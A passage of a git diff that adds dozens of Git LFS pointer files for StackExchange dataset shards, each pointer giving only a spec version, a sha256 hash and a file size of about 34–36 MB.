sha256:ba94c98878932fb033516a0673443d2dbb0c0cddd2c239fe05b1cc734bae53b0 +size 34726482 diff --git a/data/stackexchange/1-1/1850_2289.jsonl b/data/stackexchange/1-1/1850_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..63f9610c52c0132aafe0cb7007060fd0d9a30a91 --- /dev/null +++ b/data/stackexchange/1-1/1850_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5971f8f92bef1fbda4b9bf08bba3fbba511a885bf77e99d8bdef1d23ccea01ff +size 33951758 diff --git a/data/stackexchange/1-1/1851_2289.jsonl b/data/stackexchange/1-1/1851_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a721388152a3dedc7769831de3ba60595a6d0017 --- /dev/null +++ b/data/stackexchange/1-1/1851_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a0c17bc2a8ad5a02ddf2ada5251e6a041edad4e928376e6ab8c60badfce9baff +size 34814813 diff --git a/data/stackexchange/1-1/1852_2289.jsonl b/data/stackexchange/1-1/1852_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..709b535716a7f0e9a41bca335c461e40ea73fb22 --- /dev/null +++ b/data/stackexchange/1-1/1852_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f59efb7e9493c4f044d0469b9a90848cde956dfad52287eb0df2e1b7c357ca82 +size 34444761 diff --git a/data/stackexchange/1-1/1853_2289.jsonl b/data/stackexchange/1-1/1853_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f82275ed02cb3a7d9a5fe16d60a2aa40ede0c900 --- /dev/null +++ b/data/stackexchange/1-1/1853_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e2813663942d4efca4b549edda919a963e525914ae99d03d1ad69cdb527f5570 +size 34695995 diff --git a/data/stackexchange/1-1/1854_2289.jsonl b/data/stackexchange/1-1/1854_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5743785a4d40ffada72c8b3d1d9fe940c55fcb61 --- /dev/null +++ b/data/stackexchange/1-1/1854_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5b4dd807348ebf7408a0e33ad50593de6a5f0bd56c5f48c90548e670a88e0ebc +size 34232978 diff --git a/data/stackexchange/1-1/1855_2289.jsonl b/data/stackexchange/1-1/1855_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..93f3077a4905f985dbda27da1198e136524ff6b0 --- /dev/null +++ b/data/stackexchange/1-1/1855_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:41d7f2e3ea69befc3eeafce2d4cddb389d1b122705e31b967d232e5011074c81 +size 34736725 diff --git a/data/stackexchange/1-1/1856_2289.jsonl b/data/stackexchange/1-1/1856_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1a9ad3a6ecefaeaa31aab7a5fb3521492f3a9792 --- /dev/null +++ b/data/stackexchange/1-1/1856_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:983d5dbff3dbc370f6ffaac80d2a523d9c2906bae4c03bb82c1c69fc260bda0a +size 35001447 diff --git a/data/stackexchange/1-1/1857_2289.jsonl b/data/stackexchange/1-1/1857_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1795f62050b32e8670eccbcc416044f7305e39ca --- /dev/null +++ b/data/stackexchange/1-1/1857_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b8dc0ec02d0a2a36a5ffa89c6c530044ebe9e2f895cb83db00d45b5e85b8ea92 +size 34361813 diff --git a/data/stackexchange/1-1/1858_2289.jsonl b/data/stackexchange/1-1/1858_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5a47b9f3fa2805dbe559c27433c08529c5aed59e --- /dev/null +++ b/data/stackexchange/1-1/1858_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8ba3a5785893857d64089c924264300d077ecd07d777caa5ae940bbac30bbc9f +size 34296577 diff --git a/data/stackexchange/1-1/1859_2289.jsonl b/data/stackexchange/1-1/1859_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..70bcff7d81b97e24736f75551ed90c275016eb9a --- /dev/null +++ b/data/stackexchange/1-1/1859_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5072f8ad9a54a1973b05aca1c7e766a1204567a6ebcbe54475aa9bfd0629beee +size 34973290 diff --git a/data/stackexchange/1-1/185_2289.jsonl b/data/stackexchange/1-1/185_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d0be2914c2fdb5855de80d30915b4fe77bcad64a --- /dev/null +++ b/data/stackexchange/1-1/185_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2fe90ab48a02c4f0699d88adddf6cde9a54c09d41b8bf73659ab1c075582a0f3 +size 34493657 diff --git a/data/stackexchange/1-1/1860_2289.jsonl b/data/stackexchange/1-1/1860_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..89635ad7e6f11da36d78d8991025bfbfc100122e --- /dev/null +++ b/data/stackexchange/1-1/1860_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:17800c772f3bda9b0746d935656402ff3d456000ac213e9794506c09409757fa +size 34267505 diff --git a/data/stackexchange/1-1/1861_2289.jsonl b/data/stackexchange/1-1/1861_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0c9fe0238c765bceb11c248be3833028edf03964 --- /dev/null +++ b/data/stackexchange/1-1/1861_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:035bb29c499c340b8766fbd5c4bac2f2e32256e418ddcd13c853ee9cc446fa12 +size 33989150 diff --git a/data/stackexchange/1-1/1862_2289.jsonl b/data/stackexchange/1-1/1862_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ca21d73639dc8fd65caf8df68db4a7d15b426cf5 --- /dev/null +++ b/data/stackexchange/1-1/1862_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5b158b12d3c9017bf405de08bb8ae17a6edca2ec3213924871ae051703eaee35 +size 34192568 diff --git a/data/stackexchange/1-1/1863_2289.jsonl b/data/stackexchange/1-1/1863_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d658eb21b67f861d16e12ae36a6eead2aa42978b --- /dev/null +++ b/data/stackexchange/1-1/1863_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b0826b24f0885fbbc53815ba59f05f41ddfdf1aa827485565cdba2671f5b9edc +size 33909793 diff --git a/data/stackexchange/1-1/1864_2289.jsonl b/data/stackexchange/1-1/1864_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d2a8ccf393e6498569b3d15446b1741f089bf343 --- /dev/null +++ b/data/stackexchange/1-1/1864_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ab8ebdffe44750ac53ac2889780066455d78a535460dc54d1d3e7a7a48b949e2 +size 34968247 diff --git a/data/stackexchange/1-1/1865_2289.jsonl b/data/stackexchange/1-1/1865_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f7acd308e60b27af99887ed6416230b5f56a534d --- /dev/null +++ b/data/stackexchange/1-1/1865_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7e09227e5f2df4ecf01f8c5aab38510159ec3b6c5ca5e042a706adf54cbd98db +size 34363895 diff --git a/data/stackexchange/1-1/1866_2289.jsonl b/data/stackexchange/1-1/1866_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b92a7b425dbd5d880a33a810ad6eecd769cc0284 --- /dev/null +++ b/data/stackexchange/1-1/1866_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d2116fbaaee6e2ba09d31b4a867eccf396521d4e265028bee14b531204f86986 +size 34327319 diff --git a/data/stackexchange/1-1/1867_2289.jsonl b/data/stackexchange/1-1/1867_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..564889952cc7c4001b6130d6a32f5b902dcb9e7d --- /dev/null +++ b/data/stackexchange/1-1/1867_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4aee9ef9154e6b64823a2d31df08bbc2cf82706cc83946d54f4ead6201460c61 +size 35030147 diff --git a/data/stackexchange/1-1/1868_2289.jsonl b/data/stackexchange/1-1/1868_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..544b12cafe55f884963f13495d8cee72479f0d52 --- /dev/null +++ b/data/stackexchange/1-1/1868_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0348bfa8a50c97e27054eb73f63b8a2c4e2780d08cf83e00b12e59288d46c5d3 +size 34004914 diff --git a/data/stackexchange/1-1/1869_2289.jsonl b/data/stackexchange/1-1/1869_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1a1f91dee906e00be720e61d4eb815e93272e9f8 --- /dev/null +++ b/data/stackexchange/1-1/1869_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7255733b7257422bf59e8384fad3a81976c0346b33e9b7b43ac609d5565e2f66 +size 34775566 diff --git a/data/stackexchange/1-1/186_2289.jsonl b/data/stackexchange/1-1/186_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..403cfed166d0142e6077d46e0719b51ceb7263ca --- /dev/null +++ b/data/stackexchange/1-1/186_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7e8f56d4aa03fab691d16f02664b6c33969aaa0a77fbc2fd2abf9ea7025663cf +size 35157119 diff --git a/data/stackexchange/1-1/1870_2289.jsonl b/data/stackexchange/1-1/1870_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..19e138ff94b5a6f5436b99201fc8273490ef5b74 --- /dev/null +++ b/data/stackexchange/1-1/1870_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:21dd8083a6ddfc75b53aee856bf6bfce7928d358529140af93fd2fcf20ebc2dc +size 33927813 diff --git a/data/stackexchange/1-1/1871_2289.jsonl b/data/stackexchange/1-1/1871_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0104efca9ec9e585f225ffc0fdbad12ac6f49f29 --- /dev/null +++ b/data/stackexchange/1-1/1871_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:774dc8dad4b5f09820b66b8b57b4ea2f365697a3c8df798787a989057b812037 +size 34687479 diff --git a/data/stackexchange/1-1/1872_2289.jsonl b/data/stackexchange/1-1/1872_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..69b865bc6df5d8a9971df6bc0d0c08e43c5159f3 --- /dev/null +++ b/data/stackexchange/1-1/1872_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:09cb850f5ed9dcc334cbca1f0a86095da519658c2000fd35e54113dc685e12d6 +size 34778575 diff --git a/data/stackexchange/1-1/1873_2289.jsonl b/data/stackexchange/1-1/1873_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..55c31708728b00c99d2018248b4b73b519b84e61 --- /dev/null +++ b/data/stackexchange/1-1/1873_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d378b6265942130687c16239d469e91de419f50c1a817957305a9484cb41d546 +size 34797947 diff --git a/data/stackexchange/1-1/1874_2289.jsonl b/data/stackexchange/1-1/1874_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9608f5cb4bab7dc8972b24cc54d86d4ed2351af7 --- /dev/null +++ b/data/stackexchange/1-1/1874_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f48603526e259021d28138e2443243cab36ffecc9f395930e9df1692036ba64e +size 33468179 diff --git a/data/stackexchange/1-1/1875_2289.jsonl b/data/stackexchange/1-1/1875_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..25f42ca6eceaeb4c2d9747205374ae6df4c0b657 --- /dev/null +++ b/data/stackexchange/1-1/1875_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9a66a9beeaf097a280d679f651207913372c0fabd597cd2104a2c762804058f0 +size 34297365 diff --git a/data/stackexchange/1-1/1876_2289.jsonl b/data/stackexchange/1-1/1876_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b5adb27a037f2ddb3fc4e22c9a9e00f05b3e056e --- /dev/null +++ b/data/stackexchange/1-1/1876_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8c3dc2da988456b77f2cc5d56ba7a12dc986ce88246d4f59b7fb7e42d71fa1ed +size 34649351 diff --git a/data/stackexchange/1-1/1877_2289.jsonl b/data/stackexchange/1-1/1877_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..60eaf6b6ee36e3d1ef16f143741042734acceafb --- /dev/null +++ b/data/stackexchange/1-1/1877_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:aa9f651395ccf10c0898ef6e765d5c43f96270543eb82a51e283e28355633904 +size 33744689 diff --git a/data/stackexchange/1-1/1878_2289.jsonl b/data/stackexchange/1-1/1878_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..42ee1bec15b7b295a00e3ad2ccb54cc2490ac7a7 --- /dev/null +++ b/data/stackexchange/1-1/1878_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6a37f656a86cd7415ebe7bc266826b4c886b8aa1927bce740d48c448ea916b82 +size 34477157 diff --git a/data/stackexchange/1-1/1879_2289.jsonl b/data/stackexchange/1-1/1879_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a4a7353ede5c0175ad870891a79713bc0d1d4938 --- /dev/null +++ b/data/stackexchange/1-1/1879_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:13956bd62d394ee208cfe3d471871234536d50ebfec9f2a2c93bf604fa5d2680 +size 34419089 diff --git a/data/stackexchange/1-1/187_2289.jsonl b/data/stackexchange/1-1/187_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0327805b37b6d25b7e891aaa5a8e311e1d71fa29 --- /dev/null +++ b/data/stackexchange/1-1/187_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:26bbd2678085e436f283ee85b8087595f7d1f89be4c53cf2966d3fabccbc34ac +size 35201178 diff --git a/data/stackexchange/1-1/1880_2289.jsonl b/data/stackexchange/1-1/1880_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..571668c6382b8c660ec4cd17515687187bd91ee0 --- /dev/null +++ b/data/stackexchange/1-1/1880_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1b114c54a3c1b2d0b329e8d308606b7f85f28cce2b9765b3613d905d4366e2bd +size 34270622 diff --git a/data/stackexchange/1-1/1881_2289.jsonl b/data/stackexchange/1-1/1881_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..028a0a461acd1f9563ec068ee6342ab39918dc86 --- /dev/null +++ b/data/stackexchange/1-1/1881_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e96336aa586f97b14a74b119c225802e85f7b2c40146167d0a6c96c23b7032e3 +size 34283148 diff --git a/data/stackexchange/1-1/1882_2289.jsonl b/data/stackexchange/1-1/1882_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..95479509e55ca35b7d42432b63403f566267cb33 --- /dev/null +++ b/data/stackexchange/1-1/1882_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8d1cfd5eebe4a5a98b5192cec432f3c14c401269d36ba77c01970dd7a938e7e0 +size 34883453 diff --git a/data/stackexchange/1-1/1883_2289.jsonl b/data/stackexchange/1-1/1883_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2669d740a5811cfb9f4813bc482906f8d757a47f --- /dev/null +++ b/data/stackexchange/1-1/1883_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8fab9251ba7bf10ed9ae69898efa343d135ee2530e7d1d3e5177c2aec80d2bfc +size 34556064 diff --git a/data/stackexchange/1-1/1884_2289.jsonl b/data/stackexchange/1-1/1884_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7584bf181adaaab4a1f56a5729af341b4384a72d --- /dev/null +++ b/data/stackexchange/1-1/1884_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eb5f9a0d10ead3efd464d33ebfa2f1719fe88866c6eba7e3f6ff687dd07fcc25 +size 34453503 diff --git a/data/stackexchange/1-1/1885_2289.jsonl b/data/stackexchange/1-1/1885_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..21eab3e2a4ecda74bdf4eb6ebf53b331fbfec2df --- /dev/null +++ b/data/stackexchange/1-1/1885_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2c965e2c8159a657e2e54dd87d31a2b165424aac16d101ddac06aefdd7649516 +size 34531948 diff --git a/data/stackexchange/1-1/1886_2289.jsonl b/data/stackexchange/1-1/1886_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1b32f217e6b76d68d421228d8f3008abf4ca89d8 --- /dev/null +++ b/data/stackexchange/1-1/1886_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:09461b0a1b5633cc831377bdc8d7d42552cdb60eb30dcbaa2fdfc3d6a09916d0 +size 34696917 diff --git a/data/stackexchange/1-1/1887_2289.jsonl b/data/stackexchange/1-1/1887_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9fa303890a52d751dc6a61edd6bce75e0cc10602 --- /dev/null +++ b/data/stackexchange/1-1/1887_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b30bbde66050a64c2099113210c6e27f9b2da069fd6ac0ea1b42f197a154a4b9 +size 34424158 diff --git a/data/stackexchange/1-1/1888_2289.jsonl b/data/stackexchange/1-1/1888_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aeef6ffa3020c4c9ce8c615ece277fcb6fd500f3 --- /dev/null +++ b/data/stackexchange/1-1/1888_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d4910e3ee7ca65f10e563bf3cddf0c05d316eb6a7fc089e8bf19ccfc3dbcad90 +size 34332814 diff --git a/data/stackexchange/1-1/1889_2289.jsonl b/data/stackexchange/1-1/1889_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e4559e22ca2d86d1adf75f8a1f0faeed4ef8826a --- /dev/null +++ b/data/stackexchange/1-1/1889_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0c1d40d9135502152040bee04e96b7b680523910d1e45574af799fa3ebea9e05 +size 35498493 diff --git a/data/stackexchange/1-1/188_2289.jsonl b/data/stackexchange/1-1/188_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9340b8779cd657bd5956d99d9cb38537b87f2f46 --- /dev/null +++ b/data/stackexchange/1-1/188_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:022089d983147d06b09b52cf1bd300f7279ffb953be990699022b4659ceee9ee +size 34804107 diff --git a/data/stackexchange/1-1/1890_2289.jsonl b/data/stackexchange/1-1/1890_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dd204f9c8ad740761a3ad78f1159d4b3b1dc5fcc --- /dev/null +++ b/data/stackexchange/1-1/1890_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:58f82dd3bbfc6b374fc628384c2d8cc3b84d778563de651f948f30f05901a77c +size 35505395 diff --git a/data/stackexchange/1-1/1891_2289.jsonl b/data/stackexchange/1-1/1891_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..231c62736fb86b8865a8732fa6f8cd30a0758895 --- /dev/null +++ b/data/stackexchange/1-1/1891_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1eb0bbe1e60635fb01b42a16b589cdeb2b8cbb58b6c6cf70a14189de4b0028d3 +size 35899236 diff --git a/data/stackexchange/1-1/1892_2289.jsonl b/data/stackexchange/1-1/1892_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..06954e81eec3193efa6fd93d33c45bab4bbd6807 --- /dev/null +++ b/data/stackexchange/1-1/1892_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1a3da750aae0dc5228efcaf14be8fee6a3fa448c710b3fa1df6b035221e73b52 +size 36053845 diff --git a/data/stackexchange/1-1/1893_2289.jsonl b/data/stackexchange/1-1/1893_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f71520ec2b272ce4fc9813bdbbcfebc2e488edbc --- /dev/null +++ b/data/stackexchange/1-1/1893_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d1ea8ef1e34f8e5bacafb157758f42978d027b272671aab28292249ddc888111 +size 35761013 diff --git a/data/stackexchange/1-1/1894_2289.jsonl b/data/stackexchange/1-1/1894_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fabf1689358278759f6e64facc5a3d36028a4fcf --- /dev/null +++ b/data/stackexchange/1-1/1894_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d8b226f7ac10774a6755fafc7b933bd0189002d6bf70675e2bcb8a8045ae8320 +size 35636929 diff --git a/data/stackexchange/1-1/1895_2289.jsonl b/data/stackexchange/1-1/1895_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aabbf1e5ce795f4b7062a884137306119eb93df9 --- /dev/null +++ b/data/stackexchange/1-1/1895_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1a3ebf100403a58b7cf8f75619d7d062b338b4fdb1526416598b990895af1875 +size 36227894 diff --git a/data/stackexchange/1-1/1896_2289.jsonl b/data/stackexchange/1-1/1896_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..06cb972a17b2199e174931048a674b430e7c6bbe --- /dev/null +++ b/data/stackexchange/1-1/1896_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e8ac3d227bca35c4032741e221bf48a35ff8047902028f6f9e33f5eb41ec8394 +size 35861480 diff --git a/data/stackexchange/1-1/1897_2289.jsonl b/data/stackexchange/1-1/1897_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8b87eb4177c8edbff887e23d652fd966bdc4240f --- /dev/null +++ b/data/stackexchange/1-1/1897_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:01277c4a98b95ee43f2f3c45f351521f0540e307e14d9a80ffbb5c415f63bd00 +size 35827937 diff --git a/data/stackexchange/1-1/1898_2289.jsonl b/data/stackexchange/1-1/1898_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cc141f962ea648cea54d49db40849357d0a548ee --- /dev/null +++ b/data/stackexchange/1-1/1898_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f355b7eb635c5d6913e52231c908a1e2ec027090a6bddce8fcf6cf68cc52d9ef +size 35908788 diff --git a/data/stackexchange/1-1/1899_2289.jsonl b/data/stackexchange/1-1/1899_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8ce682a0000ee1ac0a8224a23120bc0c8b5300d4 --- /dev/null +++ b/data/stackexchange/1-1/1899_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8f46dc936ef66242b87f8bfcadd26714694d12f88f0910a300c9196288dd3946 +size 35874403 diff --git a/data/stackexchange/1-1/189_2289.jsonl b/data/stackexchange/1-1/189_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..98d8fbf87d4c8ea7c011e005e5d7c3eed2856f2c --- /dev/null +++ b/data/stackexchange/1-1/189_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1f732f0686cf9e952f0642fbf5fb5c79059e0e3f6ff9bb3dfce2edc04d1ca5a9 +size 35246522 diff --git a/data/stackexchange/1-1/18_2289.jsonl b/data/stackexchange/1-1/18_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..13add9b0e44fd8fdf68db2f890e6e596f6ceb1e2 --- /dev/null +++ b/data/stackexchange/1-1/18_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4831d1102719ef353a9cbb54a49dc1fd5c8008bb2b4ff0f87f4fa7a0b45c49a3 +size 36048864 diff --git a/data/stackexchange/1-1/1900_2289.jsonl b/data/stackexchange/1-1/1900_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d8297ab0cfa1c00a1ce4a6388cae636a628a22af --- /dev/null +++ b/data/stackexchange/1-1/1900_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:409a487507b2facf5a47a71969dd84a0cbca32cbe752fb048dc5327a0ca7de9c +size 36002757 diff --git a/data/stackexchange/1-1/1901_2289.jsonl b/data/stackexchange/1-1/1901_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d61b83ed455872244b95cb01ed06ac383e362905 --- /dev/null +++ b/data/stackexchange/1-1/1901_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:06f481395f0caae0e72100bf47befe96bad086491642b893b5e019d3cba84778 +size 35692880 diff --git a/data/stackexchange/1-1/1902_2289.jsonl b/data/stackexchange/1-1/1902_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..74b2b8a737399cf58bb1f23f440b9a3ee052555e --- /dev/null +++ b/data/stackexchange/1-1/1902_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:45bc19960685f7ce2427d8b57331ee567df0d276552c361de8028bd0dcda4a29 +size 36282786 diff --git a/data/stackexchange/1-1/1903_2289.jsonl b/data/stackexchange/1-1/1903_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b40ea957c2287043338a11a96e4d92cf719a3354 --- /dev/null +++ b/data/stackexchange/1-1/1903_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:96a183b9bc9213fc54a3989c9da6ebc3766ef36861f9aa1fbd621af9d1bfde4a +size 35957570 diff --git a/data/stackexchange/1-1/1904_2289.jsonl b/data/stackexchange/1-1/1904_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d0d32901913145b9f29087492e779ecbbcc6bc8a --- /dev/null +++ b/data/stackexchange/1-1/1904_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a0f77961728fbe34b7afb2c6ebef6890643e4461f1327d0480708305841316ed +size 35804497 diff --git a/data/stackexchange/1-1/1905_2289.jsonl b/data/stackexchange/1-1/1905_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8e76f9d46af1fcae9b3c24414acbb738e7909e6b --- /dev/null +++ b/data/stackexchange/1-1/1905_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9ed668793b8a8d5577823ceb22d7912ab331b20d09427b52f5c5bb2cfa34ad3c +size 35486841 diff --git a/data/stackexchange/1-1/1906_2289.jsonl b/data/stackexchange/1-1/1906_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d39e819cdb1ce72e0dd48ad1801061e16b7badbc --- /dev/null +++ b/data/stackexchange/1-1/1906_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6b022a93bc48a08e4ec560a65c6d731a06bcb2251702e277415058599c43e6cb +size 35834285 diff --git a/data/stackexchange/1-1/1907_2289.jsonl b/data/stackexchange/1-1/1907_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..67bd5170a472073e368f875738f239de73f49390 --- /dev/null +++ b/data/stackexchange/1-1/1907_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8d7cff43a8ef80fcb28d8580ba517b8da5caf55cee5533503b3a86873550b21a +size 35983970 diff --git a/data/stackexchange/1-1/1908_2289.jsonl b/data/stackexchange/1-1/1908_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..684237f89638a7ce83f4cfa3f25f57a65a9e9bd0 --- /dev/null +++ b/data/stackexchange/1-1/1908_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 